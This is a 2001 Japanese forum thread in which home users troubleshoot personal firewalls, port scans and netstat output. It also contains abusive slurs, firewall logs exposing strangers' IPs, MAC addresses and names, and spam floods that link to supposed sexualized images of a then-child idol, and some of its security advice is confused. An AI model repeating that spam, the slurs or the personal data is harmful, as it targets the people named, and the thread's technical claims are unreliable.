こういうことって、日常茶飯事に起こるものなんですか？

>>187
攻撃じゃなくてさー水鉄砲の「流れ弾」程度をブロックしただけだってば
何度逝ったら分かるかなぁ〜

つーか、過去ログの書きこみにあったはずだが・・・

Win板のfwスレで共有もﾃﾞｰﾓﾝも入れてないPCがﾊｸられるわけねーfwいらねー
ｺﾞﾐﾊﾟｹ弾く程度だとか言ってたけど実際どうなんだろう

>>189
それもそいつの勝手だ。ほっとき

>>189
相手するだけ無駄

上げといたほうがいいな

http://www.cgigame.com/bbs/raiv.html
荒らし専用

あの･･･ノートンのデフォルトの規則なんですけど

Default Inbound Loopback
Default Outbound Loopback

これって、何でもＯＫに見えちゃうんですが。
制限してるのはローカルアドレスがlocalhost
っていうだけですよね。任意のリモートからの、
任意のサービスを、TCP/UDP問わず、InもOutも
許可しちゃうことになっちゃいそうに読めるん
ですが。でも、それにしては、何回か他の規則
による警告が出たことがあるんで、一応防御は
してくれてるはずなんですよね･･･。
でも、一体どうしてそうやってうまくいくのか
わからない･･･。

Korea Network Information Center
わーい、カンコックから信号がはじめてきたさ。

踏み台にされかけたことが一度だけあったが。

＞１９６
どうやって気づいたの？

http://www.inside-security.de/advisories/fw1_rdp.html
http://www.cert.org/advisories/CA-2001-17.html
これってヤバいのか?
259/UDP が通ってもあんまりうれしくないような。

211.197.247.174ってどこか知ってます？

>>199
知らない。
でも調べればわかる。
http://www.mse.co.jp/ip_domain/

ここ一ヶ月というもの毎日同じ人物から（カンコック）トロイが送られてきます。
のーとんのインターネットセキュリティ2001を入れたんですが
USB接続なので不安です…(;´Д`)
他にも何かセキュリティソフトを入れた方がいいんでしょうか？

トロイじゃなくてトロイが仕掛けられてないかどうかのポートスキャンだろ
大体fw複数入れちゃダメ

>>202
複数はまずいのですね…ありがとうございます。

>>203
ｶﾝｺｯｸに心からの謝罪を求めるニダ!!!

農豚だと「規則：〜〜〜（トロイの名前）でブロックしました」とか何とか出るんだろうが
これは全部ただのポートスキャン。これ食らった時にトロイが常駐してれば
トロイと通信されるってだけ。PCで直接トロイ送られるなんてほとんど無いよ。

ほんとに「トロイが送られてきた」って言う人多いね。
この板で同じ事言う人3,4人見たよ。

>>206
同一人物

>>205
てっきり送られてくるものだとばかり思ってました。（恥）
でも毎日同じ相手をポートスキャンする意義がわかりません…

ただの無差別ポートスキャンでしょ
fwがブロックしてるんだから問題無し

>>201
ここに書いてある対策をこうじれば万全です！
ttp://members.tripod.co.jp/casinoA1/

ブラクラでもない関係ないURL貼って何したいんだこの知恵遅れは

カジノとかURLにあるから宣伝だろ

210.236.190.32 こいつが何度もくる

>>213
それがどうした。
俺なんか借金取りが毎日やってくるぞ。

うちは来ないな。電話も来ない。メールも。あ、MLとMMは来るか。
それ以外は来ないな。SPAMも無いな。なんとか９９とか、
灰振りすとか、ウィルス情報もまめにチェックしてるけど
そういうのも一回も来ないからあまり意味ないな。

ぞね入れててこないだっからADSLになったんだけど
そのとたんいっこもping飛んでこないんだけどなんで？？？
ルーター使ってて９８SEなんだけど。

最近ＦＷ（Tiny）入れたんですが、
ＩＳＰへの接続直後にUDPのIN/OUT（port：137）をＩＳＰ宛てにしてます。
200byte程度のデータみたいなんですが、これって何なんでしょうか？
送受信は接続直後だけで、askに対してdenyした場合とpermitした場合
で後の動作に変わりはありません。

>>212
ちがうみたいよ。
カジノはURLだけで、内容は純粋な
セキュリティ関係の解説サイトだよ。
ちょっと見てみなよ。

>>216
うちはADSLにした途端ZONEには、ばしばしping来てtinyは全く来ないんだが・・・・

>>218
だれか釣れるとでも思ったか？知恵遅れ

>>220
ルールの設定してないに10ﾍﾟｿ

221は>>219宛てだった

>>210
＞ここに書いてある対策をこうじれば万全です！
＞ttp://members.tripod.co.jp/casinoA1/

小遣い稼ぎの書き込みは止めましょう。
ひどいことになっても知らないよ。

質問させてください。
ADSL導入前にセキュリティについて調べようと
Shields Up!でポートプローブを行うと
いくつかのポートがOPENと表示されてしまいました。
Zon Alarmを導入してみたのですが同じポートがOPENと表示されていました。
そもそもここで表示されるポートはすべてClosedもしくはStealthが当然なのでしょうか？
Closeedになるにはどのような設定が必要なのでしょうか?
よろしくお願いいたします。

fw入れれば（少なくともShields up!でチェックされる程度のポートは）全部Stealthが普通です。
Openは問題外です。玄関が開きっぱなしの状態です。
ハード的な問題が何かあると思いますけど。どっちにしても
情報が無さ過ぎるので何とも言えないです。

225さん、どうもありがとうございますm(__)m
少しショックな状況ですが・・・。玄関開きっぱなしなんですね。
どのような情報があれば、ある程度わかりますか？
開いてるポートここに書いちゃったら危ないですよね？

簡単に言うと
Open･･･玄関が開きっぱなし
Closed･･･侵入者からは見えるが鍵はしまっている
Stealth･･･玄関自体隠されていて外から見えない状態
かな。情報は、プロバとかOSとか、あと空いてるポート。
IP出さなければ空いてるポート言っても何も出来んよ。
んで、Shields up!でテスト中は他に何かデータの送受信してなかったの？
それとぞねの設定はいじってない？

OSは聞いてもどうしようもないか･･･ってか窓だろーな･･･

あ、ちなみにLANとかだったらパス。

度々ありがとうございます。
Win98でプロバは3Webです。ISDNで接続しています。
開いているポートはFTP、telnet、SMTP、IDENTの4つです。
その他のポートは全てStealthになっています。
テスト中はデータの送受信はしていません。
Zon Alarmの設定は・・・セキュリティ→インターネット高です。
LANは組んでいません。

本当にご親切にありがとうございますm(__)m

プロバイダの鯖のポートチェックしてると思われ

よくわからんので調べてるんだけどとりあえずウィルスチェックしてみたらどう？
トロイがポートあけてんのかも知れんし。

串刺さってないか？でもShieldsUp!だしなぁ・・・

確かに串鯖ポートスキャンする輩はいる（藁　が
Shields up!は無いね

まあな、ShiledsUp!はHTTPS使って生IPでスキャンするはず
だから、串ってのも考えにくいんだけど、

FTP,telnet,SMTP,IDENTなんていかにも鯖じゃん

一応ウイルスバスターのonlineチェックもしてみたのですが
何もひっかからないんですよね。
トロイの事もよく分からないので、そうかなぁと警戒してしらべたのですが。
Zon Alarmを導入しても警告が鳴ったこともありません。

調べていただいてスミマセン。
自分でも昨日からいろいろ検索してみたんですが「不要なポートは閉じろ！」って
事はわかったけれども、その閉じ方となるとなかなか見つからないので・・・。

http://scan.sygatetech.com/

ここのQuickScanっての試してみ。もちろん串は外して。

http://www.rental-web.com/~azuma/jvs/vchk.htm
なんすか？

>>238
今ここにいる初心者をからかう為にやってるのか？
どっちにしろここはJ-COMのスレだ。くだらんものを貼るな

>>237って最高stealth？
おれ全部blockedなんだけど（藁
Sygateなのに

Zon Alarmは起動したままで平気ですか？＞QuickScan

おっと、かちゅ〜しゃ使ってたらJ-COMスレと間違えた。

>>240
BlockedでOK。

確か
Blocked＞Closed＞Open

>>241
当然

>>241
もちろん。っつーか起動しないでポートスキャン
しても意味無いじゃん（ｗ

>>242
なるほど了解。ちょっとビビった

あっ、そうか！ごめんなさい〜。
今やっています!!

結果出てないのにステータスバーに「ページが表示されました」ってなって
うんともすんとも言わなくなったらページの更新しなよ

244は俺だが・・・まあいいや（ｗ

ごめんなさい。ずっと名前が“244”になってました。
今QuickScanやっていますが、ずっと画面真っ白だけど大丈夫なんですかね？
40分くらいかかるんですか??

だいたい一分以内に終わるけど

40秒の間違いかと思われ（藁

>>240
オマエ、80もblockedなんか？
うそくせ〜

大丈夫！うんともすんとも言わないけれど、表示されましたになってません。
続行中ですっ！！

更新しれ
俺も2回何もでないで止まったよ

>>252
全部Blockedが当たりまえ

>>252
ヴァカ？

>>242
Port80　のブロックのやり方教えろ

終わりましたが、全部Blockedですね。

恋のから騒ぎ

Shields upが何らかの理由で誤認に50ﾍﾟｿ

もう一回Shields up逝きかなこりゃ･･

>>261
チェック中に自分のIPでるでしょ？
ちゃんと生IPかどうか確認するようにね。

もう一回いった方がいいですか？＞Shields up
これやってるときってICQとかメール送信とか止めたほうがいいですか？

>>263
行ってみた方がいいかもね。このままだと気持ち悪いだろうし。
ちゃんと生IPかどうか確認すること。

あと、サーバー型のアプリを使わなければ別に問題無いよ。
よくわからなければ全部止めときなさい。

にしてもたとえばメール送受信程度でSMTPがOpenになったりするものか?

ああ、良く読んでなかった

>>265 サーバー？

また↑で“244”ってやっちゃいましたが^_^;

Shields up 終了しました！
なんと全てStealthです。
なぜだろ・・・。

サーバー型アプリってのはどういうものを言いますか？
メールが来たかどうか調べるソフト、PCの時間を合わせるソフトなんかも
このサーバー型アプリにあてはなるのでしょうか？

失礼。

>>268
メーラー、ブラウザとかは完全にクライアント
メールが来たかどうか調べるソフトも、定期的にPOPサーバーに
リクエスト送ってるだけだから関係無し。

時間合わせは、NTP、SNTPのどっちを使ってるかによる。
ICQは使った事無いから知らん。

とりあえず前と調べるときの環境の違いは
時間合わせのソフトとメール調べのソフトを常駐終了させたくらいなんですよね。
時間調べは桜時計といううのを使っていました。

これを使っていてOPENになるのだとしたら
あまりよくないって事ですか？
特に問題なしなのかな？

とりあえずStealthになったのでホッとしているのですが。

>>271
別にその二つは関係無いよ。ShiledsUp!がなんか勘違いして
プロバイダの鯖をスキャンしたんじゃないかね

なるほど。
そういう事もあるのですね＞勘違い

とりあえずStealth万歳です。
皆様、長々とお付き合い頂いてありがとうございました。
何人いらっしゃるのかわからないけど、感謝感激です。
これからも自分で頑張って勉強していこうと思いました。
たくさん教えてチャンですみませんでしたm(__)m

しかしZone導入前と後でOpenが確認されたんだから
再現性のある問題な気もするなぁ･･･
まぁたびたびチェックしてれば（もし問題あるとすれば）
問題のあるアプリとか特定できると思うが

Symantec Security Check

http://security2.norton.com/us/home.asp?j=1&venid=sym&langid=us&plfid=20&pkj=XAWDPWMDZWPALZSYPYD

そうですね。
度々チェックしてみます。
ちなみに今は時計合わせ、メールチェックソフト起動状態でも
全てStealthになりました。
昨日から何時間もやっていたのがウソのようです・・・

http://www.sdesign.com:8080/cgi-bin/fwtest.cgi

当然串は外して行くこと。まあまた変な結果がでたら、
いろんなサイトのポートスキャンでチェックしてみなさい

まぁ暇な時にいろんなセキュチェック試してみれ>>276

もう一丁どうもありがとうございます！
これからやってみますー

タフだな（ｗ

> We still recommend running this test both with and without Secure Desktop enabled...
> so turn it off and try the test again.

すいません、これってどういう意味ですか？
何をしてからもう一回やれと？

>>281
”FWが動作してる状態と切ってある状態の両方でテストする事をオススメします”
って感じか？

何で切ってある状態でテストする必要があるんだろ？

なんかしつこくアタックされるから何かと思ったら
WinMX切ってるのに6699を何十回と叩いてきてる奴が
結構居るようだ。

2001-07-16 15:27:19 GMT
By 24.78.70.222 (柴崎雄志 )
Attack #2003502: UDP port probe
Port information: port=6257&reason=Firewalled
Attack count: 31
Attack result: Blocked
Attacker's DNS Name: h24-78-70-222.vc.shawcable.net
Attacker's NETBios Name: 柴崎 雄志 
Attacker's MAC Address: 002078103F47
Attacker's Machine Name: 柴崎雄志
Attacker's Group: 無し

>>283
・・・・どこがアタックだ。当たり前

そう言うのもアタックって言うんだよ

ネタ？

WinMX初心者

pingを連打するアタックだな

パソコン自体初心者だろ

それもそうだ

>>290=>>291
パソコン初心者(藁

そんなつまらん自演してどうすんだか知らんが、
とりあえず参ったって言っとくよ。ごめんね上級者

MXきった直後に6699を叩かれるのをアタックって言ってる奴に初心者って言われてもねぇ･･･

「パソコン」ってのを持ち出すあたり
いかにも夏厨だな…

イコール厨房がｳｻﾞｲから強制ID制導入してくれんかなぁ

ﾏｧﾏｧ　みんなで降参しとこうや

アタックだなんて何処にも書いてないし…
ばか？

＞なんかしつこくアタックされるから何かと思ったら

ばか？

>>283はZoneAlarmとWinMXを颯爽と使いこなす
超エキスパートってことで

何でこんなに必死に絡んでくるのか分からんな
夏厨の嫉妬か？

夏休み入ったのかなぁ

ﾌﾟﾌﾟ
Zonealarmじゃないのに
夏休みだなぁ

やばい、平静を装う夏厨が面白くなってきた（ｗ

じゃあ農豚だろうか（藁

>>299
それがアタックだとは何処にも書いてないのに
ばか？

201みたいな奴と同類って事だろ？

農豚は別にいいか
どこぞのアンチウィルスの簡易fwか

>>304
sageの奴は文章も読めなけりゃスキルも無い
夏厨ばっかしだね

どうやらFWもまともに使えない夏厨が
嫉妬している模様

自分を晒しageしてらっしゃるお方にそのような事を言われましても（藁

夏休みの友早めに済ませとけよ

>>308
全部大ハズレ
夏厨確定！

>>311の真性夏厨を晒し上げ(ﾜﾗ

＞上級者を除くみなさん

学生の夏休みが始まったら
この板には来ないほうがよさそうですね。

つーかまだ早いんでないの

うーん、でも上のログを見ればどのファイアウォールソフト
使ってるか分かる人にはすぐ分かると思うけど、
夏厨の書いてるのは全部適当で大ハズレなんだよね。
しかも「パソコン初心者」とかいかにも何も知らなさそうな
自爆書き込みが…

　　　　 　　　　　 ＿＿＿
　　　　.　　　　　 |（･∀･）|
　　　　　.　 　 　 |￣￣￣　　　ｼﾞｻｸｼﾞｴﾝ共和国
　　　　　　　　　△
　　　　　　　 △ｌ　|
　　　＿＿△|_.田 |△＿＿＿＿＿
　　　　　　|__|__門_|__|＿＿＿＿＿|＿＿＿＿＿

まぁまだ厨房でも起きてるか

学生なんて年中休みみたいなもんなのに
中卒には理解不能かな？

厨房は放置と言うことで

もうちょっと続けてくれ（ｗ

>>322
もう腹いっぱいだ。ﾔﾒﾚ

馬鹿ばっかし

>>317
どのログ？

285 名前：名無しさん＠お腹いっぱい。 投稿日：2001/07/17(火) 21:25
>>283
・・・・どこがアタックだ。当たり前

わかったから。285の自作自演だね。わかったからもう寝れ。いい加減しつこいよ。

やだ
ねないもーん
夜はこれからよ
ｳﾌ

何でこれくらいのことでこんなに荒れるんだ？

ほっときゃいいのに何でこんなに必死に絡むの？

わかった。言いたいことはわかったからageないでくれ

>>331
あんたも構うな

WinMXって切ってからも個人PC向けにパケット飛んでくるんだな

なんで上げたらイカンのか不明

無意味だから。

　　　＿＿＿　　　　　　　　＿_／
　 ／　 　 ／＼　　　　　／ _／＼　　　　　 ＿＿＿
／￣￣￣＼／|　　　／|￣ .＼／|　　　 ／　　　 ／＼
　　　　　　　|　 |　　　|／＼＿_.|／　　／|￣￣￣＼／|　　　　　　　＿　　　　　 ＿_　　　　　　　__
　　／￣￣~|／|　　　＼／＿／　　　 |　|＿＿＿＿|／　 　 ／￣￣／|　　／￣ ／＿ 　　／￣／　 ／|
.／|￣￣￣.|　 |.　　　　 ￣／__　　　　|／　　　　 ／　　　／＿＿／　 |　／　_／~~／|　∠＿／フ ／　.|
|　 |　　　　 |　 |　　　／フ￣／＼　　 |￣|￣￣￣　　　　￣　 ／|　 ／ ／￣　　／／　 ／　 ／　 |　 ／
|／＼　　　.|　 |　 ／|￣￣￣＼／|　 |／＼　　　　　　　　　　|＿|／　　￣￣￣|／　　　￣￣　　__|／
＼／￣￣~|／|　 |／＼ 　 　___|／　　＼　 ＼　　　＿_　　　 |／　　　　　　　／　　　　　／￣￣／
　 ￣￣￣~|／　　＼／￣￣／　　　　　 ＼／￣￣ ／　　／　　　　　　　／　　　　　 ／　　　／
　　　　　　　　　　 　 ￣￣￣　　　　　　　　 ￣￣￣　　　　　　　　　　　　　　　　　　　￣￣￣
　　　／|
　 ＿|　.|＿＿　　　　 ＿＿＿__　　　＿＿＿＿　　　　　　　　　　　　　　＿＿＿／
／ 　|／　　／|　　／　　　　 ／|　∠_＿＿＿／|　 　 ／|　／|　 　　 ／＿＿／
￣￣|￣|￣|　|　　￣￣￣￣|　 |　|／　　　　 |　.|　　 |　 |　|　|　　　　￣ | 　|
　 　 |／　 .|　|　　　　　　　　|　.|　　　 　　　　|／　　 |／　 |／＼　　　　 |　 |
　 ／　　／|／　　／￣￣￣|／　　　　 　　／　　　／　　　＼／　　　　　|／
　　　　　￣　　　　￣￣￣￣

sageの書き込みの方が無意味だよ
どうせ上がるのに（藁

無意味だと思うならどっか他に逝けば？

生で全員にふしあなして欲しい気分

　 　　　　 ／￣￣￣￣￣
　冫、 　＜　　無意味な書き込み
　` 　　　　＼＿＿＿＿＿

ここから１００レス以上は無意味な書き込みが続く模様
それもまた面白い

でもageは一気に上まで上がるけど、sageで書き込んでも
下がらないんだからどっちが無意味かと言われると・・・

ふざけんなよ！お前等！！

ここからしばらくは雑談スレと言うことで

わかった。俺たち夏厨が悪かった。君の言い分は全面的に正しいよ

> 2001-07-17 12:27:08 GMT
> By 152.94.60.66 (INFOPC2 )
> Attack #2003102: TCP port probe
> Port information: port=6699&reason=Firewalled
> Attack count: 1044
> Attack result: Blocked
> Attacker's DNS Name: INFOPC2
> Attacker's NETBios Name: LASSE 
> Attacker's MAC Address: 000102A36938
> Attacker's Machine Name: INFOPC2
> Attacker's Group: SAMSKIPNADEN

>もう1000回以上連打してる


これはアタック、紛れも無いアタックです。

はい無事解決

って事でfwの話に戻りましょう

しきり直し

しきり直し

しきり直し　

しきり直し

しきり直し

しきり直し

しきり直し

しきり直し　　

しきり直し　　

しきり直し　　　　

しきり直し

しきり直し

しきり直し

しきり直し

しきり直し

ﾌﾟ
こんどは荒らしか

しきり直ししすぎました

そそ
荒らしだよ
しきり直し

自演のうちはまだ可愛かったが、セキュ板でDUKE撃つとはね・・・

「彼」が寝るまでこの調子でしょうな

まだなんかぼやいてます

眠いなあ

一番上にあるときはsageしても意味無いよ

ひまんこ

これもお前だろ？＞荒らし
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi

5 名前：名無しさん＠お腹いっぱい。 投稿日：2001/06/04(月) 19:00
荒らされないよう、とりあえずsageときな。

セキュリティがなってねえぞ！




そうか、上げると荒らされるのか
なるほど

荒らされても別に構わないからいいや（藁

http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
これ荒らし君のＨＰだってさ！

ちんちん

フレッツＡＢＣＤ

ひまだから相手してくれ
ちんちん

|
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)
|` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)
|` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)
|` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)
|` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)
|` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)
|` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／
|⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡.冫、)⌒彡冫、)⌒彡
|冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)` ／ 冫、)
|` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／⌒彡 ` ／

http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ
http://www35.tok2.com/home/ahh/cgi-bin/minibbs.cgi
何と！加護亜依のビーチクすけすけ画像がこの掲示板にあったよ

ｻﾝｷｭ

もう消えてるみたいです

なんだこの消防は

以前ぞねと黒氷同時に使うことには意味があるって見たことあるけど･･（ここでだっけかな？）。
かんきょー的に（つーか遅いだけ・・・泣）１つしかつかえんなら・・・
さーＤＯＴＣＨ。
つーかネタっぽいけどゴメンして・・

ぞぬの方が大分マシ。以上

>384
thanks

プロキシーについて教えてってのはダメですか？

| C:\>netstat -na
|
| Active Connections
|
| Proto Local Address Foreign Address State
| TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
| TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
| TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
| TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING
| TCP 0.0.0.0:1028 0.0.0.0:0 LISTENING
| UDP 0.0.0.0:135 *:*
| UDP 0.0.0.0:445 *:*
| UDP 0.0.0.0:1027 *:*
| UDP 127.0.0.1:1355 *:*

NISで上記のポートは全部塞いであるはずなのに、
なんで LISTENING て出るんですか。
W2K SP1 + IE5.01 SP2 です。

>>386
ここを読むと良いよ。
http://www8.big.or.jp/~000/CyberSyndrome/

偽串を立てたら、ここで宣伝すればいいってわけだ。

>>389
何がしたいの？（藁

>>390
あの手のページの正しい使い方を教えてあげただけだ。
勉強になったか？

だ、誰か･･･

質問！！
今まで、BlackICEの体験版を使ってきた初心者です。
今日、BlackICEの体験版の期限がきたので、他に何か簡単でいいファイヤーウォールがないか調べにきました。
といことで、何がいいですか？
ちなみに当方は英語は中学生レベルのものでも、よくわかりません（おぃ
あと、Promitronを使っていても使えるのがいいです。

ここまでのログを読んでみて
Sygate Personal Firewall
Tiny Personal Firewall
ZoneAlarm
が人気があるみたいなのですが、
Sygateの日本語化パッチってどこにあります？

無い

>>394
無いんですか（ｗ
じゃあ、おとなしくZoneAlarmかTinyを使うことにします。

Sygateの日本語化パッチはないです。

ところで、>>387さんがやっているようにＭＳＤＯＳで「netstat -na」ってコマンドを使ってみたら、
TCP 127.0.0.1:2973 0.0.0.0:0 LISTENING
UDP 127.0.0.1:2973 0.0.0.0:0 LISTENING
UDP 自分のIP　　　　*.*
UDP 自分のIP *.*
って表示されたんですが、これってやばいですかね。

ちなみにPromitronであけてあるローカルホスト（127.0.0.1)のポートも表示されてましたが、2973なんて開けた覚えがありません。
あと、UDP 自分のIP　*.*　ってなんですか？

今日、ウィルスバスターの会社のオンラインウィルススキャンをしたばっかりだからトロイはないと思いますけど・・・・

うあ〜どうしよう！！
TINYを導入したら、何だか侵入されるソフト（トロイ）が仕込まれてるって分かったよ。

a5-0-1.tokyo-n1.bbn.web.ad.jp（133.160.245.2）←こいつ

netstat -naをしてみたら

0.0.0.0:44334というポートが開いていて、
Local Address ForeginAddress
127.0.0.1（ポートは秘密）　　　　127.0.0.0:44334
になっていて

ping 127.0.0.0:44334と打つと
tcpip kernel driver←これを遮断しますかってでて、そこに
a5-0-1.tokyo-n1.bbn.web.ad.jp（133.160.245.2）　このＩＰが乗っていたんだよ。
接続しなおしてもトロイっぽいから常に奴と接続されているし・・・

こいつの使っているプロバイダを教えてください！！

http://www.mse.co.jp/にあるＩＰドメインサーチからでは僕の環境では検索結果が表示されませんでした。
誰かお願い！！

ウィルスバスターの会社のオンラインウィルススキャンをしてもウィルスは検索されないし、
アンチトードでウィルス検索してもウィルスは検索されないのに・・・
ちなみにBlackICEでは全然気がつかんかった！！
TINYのおかげだ（Ｔ＿Ｔ）

PC JAPNANのＣＤにのっていたInter Net test TOOLのルート追跡で
a5-0-1.tokyo-n1.bbn.web.ad.jp（133.160.245.2）このＩＰが
kure001n.ppp.web.ad.jp最終的にここからでていることがわかったよ。
こいつ誰？（涙）
パスワードとか盗まれまくってたのか・・・鬱だ。

なんか、自分のプロバイダっぽい気がしてきた（おぃ

･･････
まぁどっちにしろ黒氷はアウトバウンド一切教えてくれないからね･･･
それを知った上で使うべきだけど･･･

ネットに接続する時tcpip karnel driverが3回アウトバウンドで何かを送信したがるんですが
これって何をしてるんでしょうか？遮断しても一応つながるんですが･･･

Win2000 SP2で、ネット接続はISDNなんですが
Tiny Personal Firewallを、今日初めてインストールしてみました。
最初のうちは、順調でしたが
そのうち、リストにないプログラムを起動してもなにも聞いてこなくなり
その後、Tinyを終了しても、アンインストールしても
外のネットワークに接続することが、全くできなくなりました。
（WWW, メール, FTP, Ping, Telnet 等、全て不可。）
ローカル（同一マシン内）のWWWサーバーには接続できるし
ダイアルアップ接続によって、プロバイダから割り当てられた
IPアドレスへのPingは通ります。

一体、どうなったんでしょう？
心当たりのある方は、教えてください！ 困った・・・。
（これは、サブの、しょぼいノートから書いてます。）

>>404
もう一回Tinyをインストールして、ルールを全部削除してみたら
どうでしょう。それと、ファイアーウォールの設定がAsk Me Firsit
になっているかも確認してみてはいかかでしょうか。

>>405
ありがとうございます！
再インストールして、ルールを全部削除したら
全てうまくいきました。とても助かりました。

インストール後、再起動すると
NetBIOS関係のポートをどうするか聞いてきて
10くらい、自動的にルールができていますが
それらが原因、ってことなのかな？

あと、使い続ける以上はどうでもいいことですが
アンインストール後も、Tiny Personal Firewall というフォルダが
共有違反で削除できないのが、ちょっと気になりました。

>>406
再起動すりゃ直るだろ?

>>406
NetBIOSについては、ここをみてちょ

http://www.personalfirewalljapan.com/explanation/bios.htm

>>407
いやそれが、再起動しても、ダメだったんで・・・。
まぁ、あまり深く追求しないことにします。

>>408
ありがとう。読んどきます。

ZoneAlert常駐させたらクッキーを弾くようになったので、
２ｃｈに書き込めません。どうしたらよいのでしょうか？
FWソフト自体にクッキー受け入れる設定は無いみたいなので。
初心者でスマソ

あれれ初心者板のほうだったかな。

あれれ、今FW常駐で書き込めたぞ。
そうか、レベルを「中」にすればいいのか！
「高」が厳しすぎるのだな。
ふむふむ、勉強になった。

test

test2

クッキーとfw関係あるはずないだ炉･･･

>>410
ZoneAlertって何？

>>415
ノートンなら関係あると思うが・・・

まぁ、プライバシー制御とファイアウォール機能は別物だからね。

プロバイダによって、外に出れるときと出れないときがあることが、判明しました。
使ってる3つのうち、2つは全く問題なしですが、1つは全然外に出られません。
理由なんて、サポートに聞いても、教えてくれない（あるいは、わからない）だろうなぁ・・・。

ZoneAlertってZoneAlarmの旧名？
検索したらZone Labsに繋がるし。

